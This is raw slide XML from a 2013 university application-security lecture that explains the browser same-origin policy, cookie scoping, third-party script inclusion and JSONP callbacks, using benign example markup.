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8" r:id="rId2"/>
    <p:sldId id="269" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="275" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="276" r:id="rId10"/>
    <p:sldId id="277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78" r:id="rId24"/>
    <p:sldId id="291" r:id="rId25"/>
    <p:sldId id="270" r:id="rId26"/>
    <p:sldId id="26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200"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="E6E6E6"/>
    <a:srgbClr val="E0E0E0"/>
    <a:srgbClr val="133C5D"/>
    <a:srgbClr val="1310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01" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="102" d="100"/>
          <a:sy n="102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366F15-64CE-44F6-AF51-8F568C022106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A05D92-3DF3-46AE-AA3E-E4F00EDCEF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98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D343F-1CE6-4DBC-81D0-0B6C4F0D4CEA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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478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C9297-094B-4D43-A2BC-251F70F7FAC6}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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789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516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516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01244-2662-4920-9F2A-89027007E985}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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304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9F28C-CA03-417A-BB11-4581E88297A7}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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882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3CE42-88DE-4DAE-BEE6-F990EFC56C39}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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202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6482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6482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61E9-EBCB-4F75-92F3-F2DCBCACB9FA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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423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609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1"/>
            <a:ext cx="4040188" cy="4038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219200"/>
            <a:ext cx="4041775" cy="609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28801"/>
            <a:ext cx="4041775" cy="4038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A2E2A-7803-4D06-A8B8-49F1F33489B9}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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356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2B316-30AA-4DF3-9FF0-A99B6D420566}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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596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DDD29-E6DC-41B0-9328-87E0347E6B3D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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448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5943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432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0766-FF88-4569-AE43-2DC25C757AC3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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001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0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5A12-29E9-4A8B-BF11-BE0A3FC00240}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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736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648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AD201-9091-4BC7-8645-E6644BE2C723}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/29/2013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7F6B3-FE9A-4A71-A476-BA18060D40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363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png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ISEC 400 Application Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Week </a:t>
            </a:r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Copyright © 2013 Todd Whittaker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(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todd.whittaker@franklin.edu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5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Browser Same Origin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Can’t get around this on the server side either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1581486"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2136775" y="1873250"/>
          <a:ext cx="4868863" cy="310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Visio" r:id="rId3" imgW="4868872" imgH="3109578" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="4868872" imgH="3109578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36775" y="1873250"/>
                        <a:ext cx="4868863" cy="3109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429000"/>
            <a:ext cx="381000" cy="392824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="1524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438400"/>
            <a:ext cx="381000" cy="392824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="1524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9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252846" y="4343400"/>
            <a:ext cx="3428999" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 35362"/>
              <a:gd name="adj2" fmla="val -82235"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User cookies set by these sites are sent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to the point of origin.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726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Browser Same Origin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Can’t get around this on the server side either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1152467"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2136775" y="1873250"/>
          <a:ext cx="4868863" cy="310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Visio" r:id="rId3" imgW="4868872" imgH="3109578" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="4868872" imgH="3109578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36775" y="1873250"/>
                        <a:ext cx="4868863" cy="3109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429000"/>
            <a:ext cx="381000" cy="392824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="1524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429000"/>
            <a:ext cx="381000" cy="392824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="1524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9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633847" y="4343400"/>
            <a:ext cx="2490353" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49085"/>
              <a:gd name="adj2" fmla="val -96495"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This cookie is the user’s cookie for site1.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6096000" y="4114800"/>
            <a:ext cx="2490353" cy="1676400"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -55134"/>
              <a:gd name="adj2" fmla="val -73905"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This cookie is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>site1’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie for site2. Not the user’s cookie.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289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Browser Same Origin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Can’t get around this on the server side either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429000"/>
            <a:ext cx="381000" cy="392824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="1524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429000"/>
            <a:ext cx="381000" cy="392824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="152400" dir="5400000" sx="90000" sy="-19000" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="15000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effec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7868036"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2136775" y="1873250"/>
          <a:ext cx="4868863" cy="310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Visio" r:id="rId4" imgW="4868872" imgH="3109578" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="4868872" imgH="3109578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36775" y="1873250"/>
                        <a:ext cx="4868863" cy="3109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438400"/>
            <a:ext cx="381000" cy="392824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="1524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2" name="Rounded Rectangular Callout 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330200" y="4267200"/>
            <a:ext cx="4318000" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 44376"/>
              <a:gd name="adj2" fmla="val -131805"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>There is no way for site1 to get the user’s site2 cookie unless site2 is insecurely written (e.g. vulnerable to XSS).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848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Browser Same Origin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same site policy applies to scripts on a page attempting to access other pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts loaded from 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party web sites; e.g. on page www.site1.com/index.html we see the following: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4648200"/>
            <a:ext cx="8077200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src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=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"http://www.site2.com/scripts/script.js"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000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73933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Browser Same Origin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same site policy applies to scripts on a page attempting to access other pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts loaded from 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party web sites; e.g. on page www.site1.com/index.html we see the following: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4648200"/>
            <a:ext cx="8077200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src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=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"http://www.site2.com/scripts/script.js"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman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4953000" y="2667000"/>
            <a:ext cx="3200400" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -55710"/>
              <a:gd name="adj2" fmla="val 114715"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This script runs on the index.html page as if it originated from site1. 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30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Browser Same Origin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same site policy applies to scripts on a page attempting to access other pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts loaded from 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> party web sites; e.g. on page www.site1.com/index.html we see the following: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4648200"/>
            <a:ext cx="8077200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src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=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"http://www.site2.com/scripts/script.js"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman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4953000" y="2667000"/>
            <a:ext cx="3200400" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -55710"/>
              <a:gd name="adj2" fmla="val 114715"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This script runs on the index.html page as if it originated from site1. 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838200" y="1676400"/>
            <a:ext cx="3657600" cy="2133600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36209"/>
              <a:gd name="adj2" fmla="val 87009"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What can it do? Anything.  Post to other sites, read cookies, etc.  This is how Google Analytics tracks page visits.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3810000" y="5562600"/>
            <a:ext cx="3657600" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -44851"/>
              <a:gd name="adj2" fmla="val -141345"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="292100" dist="139700" dir="2700000" algn="tl" rotWithShape="0">
              <a:schemeClr val="tx1">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
                <a:alpha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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You had better trust site2!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263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Browser Same Origin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Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSON: JavaScript object notation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A data transfer format that is actually JavaScript code too.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Executing “data” is a bad idea overall.  Better to just parse it without executing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSONP: a way of getting around same origin for a data request that involves a callback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975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Browser Same Origin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Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSONP: a way of getting around same origin for a data request that involves a JSON data and a callback (a function already on the page)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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site2 checks a cookie and replies with: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276600"/>
            <a:ext cx="8077200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src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=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"http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>www.site2.com/query?cb=doUpdate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"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF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4495800"/>
            <a:ext cx="8077200" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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Consolas"/>
              </a:rPr>
              <a:t>doUpdate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({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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"name"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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"John Q. Public"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,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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"email"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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"jqp@gmail.com"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,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})</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C5C5C"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600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17367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Browser Same Origin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Exceptions to same origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JSONP: a way of getting around same origin for a data request that involves a JSON data and a callback (a function already on the page)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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site2 checks a cookie and replies with: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276600"/>
            <a:ext cx="8077200" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>src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=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"http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>www.site2.com/query?cb=doUpdate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"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>script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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF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4495800"/>
            <a:ext cx="8077200" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="133C5D"/>
            </a:solidFill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 wrap="none" rtlCol="0">
            <a:no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Consolas"/>
              </a:rPr>
              <a:t>doUpdate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({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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"name"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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"John Q. Public"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,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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"email"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: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C00"/>
                </a:solidFill>
